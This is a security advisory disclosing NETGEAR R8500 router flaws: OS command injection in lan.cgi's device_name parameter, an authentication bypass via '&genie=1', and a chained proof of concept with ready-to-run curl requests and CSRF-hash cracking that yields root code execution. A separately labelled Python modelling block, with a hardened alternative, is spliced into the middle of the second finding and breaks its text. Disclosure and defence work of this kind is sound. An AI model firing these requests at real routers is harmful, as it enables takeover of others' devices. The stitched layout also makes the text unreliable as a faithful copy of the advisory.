Trustwave SpiderLabs Security Advisory TWSL2018-003:
Vulnerabilities in NETGEAR R8500 router firmware

Published: 02/07/2018
Version: 1.0

Vendor: NETGEAR (www.netgear.com)
Product: NETGEAR R8500 router (firmware)
Version affected: 1.0.2.94_1.0.79, possibly earlier versions

Product description:
The NETGEAR R8500 router is a complex piece of hardware and software which provides functions such as remote management via a web interface, USB storage support and many others.

Finding 1: Root-level OS command execution via injection in the device_name parameter on the lan.cgi page

The R8500 web management UI provides a page to manage LAN settings (lan.cgi). The page accepts multiple parameters; one of them, device_name, is not sanitized properly and is used to build a shell command which is executed as root. This makes it possible to gain complete control over the router once access to lan.cgi is gained.

Example attack:

curl -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1" http://192.168.1.1/lan.cgi?id=988337b27ba1f3cdc280e454860f8b10d84e42da

Note that after the above is executed, there is a file /tmp/jimmers owned by root. The injected command could equally fetch and execute arbitrary code from a remote URL.

Finding 2: Bypassing basic authentication by adding &genie=1 to the query string

The logic of the parse_http_request function allows any user to bypass HTTP Basic authentication by adding "genie" to the query string.
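The injection in Finding 1, modelled offline as an added example (this is not the advisory's PoC code nor the R8500 firmware's own code). It decodes the device_name value exactly as it appears in the PoC request body, shows how a double-quote in that value breaks out of a quoted shell argument and turns one command into three, and places a hardened builder beside it. The command template `nvram set lan_hostname="%s"` is an assumption standing in for whatever the firmware really builds; the advisory does not name it.

```python
"""Finding 1 modelled offline: how the device_name payload escapes a
double-quoted shell argument, and a hardened builder that cannot be escaped.
Added example, not the R8500 firmware's code; the command template is an
assumption."""
import re
import shlex
from urllib.parse import parse_qs

# Constructed request body: only the parameters that matter for the
# injection are kept from the advisory's curl command.
POC_BODY = ("action=Apply"
            "&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B"
            "&lan_ipaddr=192.168.1.1")

# ASSUMPTION: the CGI builds something like this and hands it to system(3).
# The real template is not given in the advisory.
VULN_TEMPLATE = 'nvram set lan_hostname="%s"'


def device_name_from_body(body):
    """Return device_name as the CGI sees it after URL decoding
    (%22 -> '"', + -> ' ', %26 -> '&', %2F -> '/')."""
    return parse_qs(body, keep_blank_values=True)["device_name"][0]


def build_command_vulnerable(device_name):
    """Unsanitised interpolation: a '"' in device_name closes the quote and
    everything after it is parsed by the shell as further commands."""
    return VULN_TEMPLATE % device_name


def shell_commands(cmd):
    """Tokenise like /bin/sh and split on '&&' so the number of separate
    commands the shell would actually run becomes visible."""
    cmds, cur = [], []
    for tok in shlex.split(cmd):
        if tok == "&&":
            cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    cmds.append(cur)
    return cmds


# One RFC 1123 hostname label: letters, digits and interior hyphens only.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def validate_device_name(device_name):
    """Allowlist check: quotes, spaces, '&', '/', ';', '`', '$' and every
    other shell metacharacter are rejected rather than escaped."""
    if not HOSTNAME_RE.match(device_name):
        raise ValueError("invalid device_name: %r" % device_name)
    return device_name


def build_command_hardened(device_name):
    """Validate, then return an argv list meant for execve/subprocess without
    a shell. No string is ever handed to 'sh -c', so even a name that
    slipped past the allowlist would stay a single argument."""
    name = validate_device_name(device_name)
    return ["nvram", "set", "lan_hostname=" + name]


if __name__ == "__main__":
    name = device_name_from_body(POC_BODY)
    print("decoded device_name:", name)
    vuln = build_command_vulnerable(name)
    print("shell receives:", vuln)
    for c in shell_commands(vuln):
        print("  runs:", c)
    try:
        build_command_hardened(name)
    except ValueError as err:
        print("hardened builder rejected it:", err)
    print("hardened argv for a normal name:", build_command_hardened("R8500mge"))
```

Running it prints the decoded value `A" && touch /tmp/jimmers && echo "B`, the resulting shell line `nvram set lan_hostname="A" && touch /tmp/jimmers && echo "B"`, and the three commands the shell would execute; the `touch` in the middle is exactly what leaves /tmp/jimmers behind in the advisory's test. The hardened builder rejects the payload and, for a legitimate name, produces an argv list that never passes through a shell.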
Chained with previously reported findings (namely recovering the session ID from MNU_top.htm and arbitrary code execution via the lan.cgi page) this allows arbitrary code execution on the router as the root user.

Complete POC:

1. Get the CSRF hash:

curl http://192.168.1.1/MNU_top.htm | grep "id="

2. Feed the hash to the csrf program (https://github.com/SpiderLabs/advisories-poc/blob/master/TWSL2018-003/csrf.c) to recover the CSRF ID and generate the CSRF hash for the lan.cgi page, for example:

./csrf lang_top.cgi c98550f375a9fb3ced304692ed99329e4f7d80c8 lan.cgi
page: lang_top.cgi
hash: c98550f375a9fb3ced304692ed99329e4f7d80c8
Breaking CSRF starting from: 1489727736
CSRF token found: 1489727493
Hash for the new page: cbaf114c7e69e15b9c84680f6da4d6ce77b439c5

3. Launch arbitrary code as root on the device via the following (adjust the "id=" value first):

curl -v -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1&genie=1" "http://192.168.1.1/lan.cgi?id=cbaf114c7e69e15b9c84680f6da4d6ce77b439c5&genie=1"

A response containing "Updating Settings" comes back. Examine the /tmp directory on the device: in the above snippet the shell command "touch /tmp/jimmers" is executed as root. This could be adjusted to download any code from the Internet via curl and launch it.

Remediation Steps:
Please visit the NETGEAR links in the references section to see if your model of router is affected and how to download patched firmware.

Revision History:
03/16/17 - Vulnerability disclosed
09/22/17 - Patch released by vendor
02/07/18 - Advisory published

References:
1. https://kb.netgear.com/000045850/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-Modem-Routers-PSV-2017-1207
2. https://kb.netgear.com/000048998/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-or-Modem-Routers-PSV-2017-1208

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.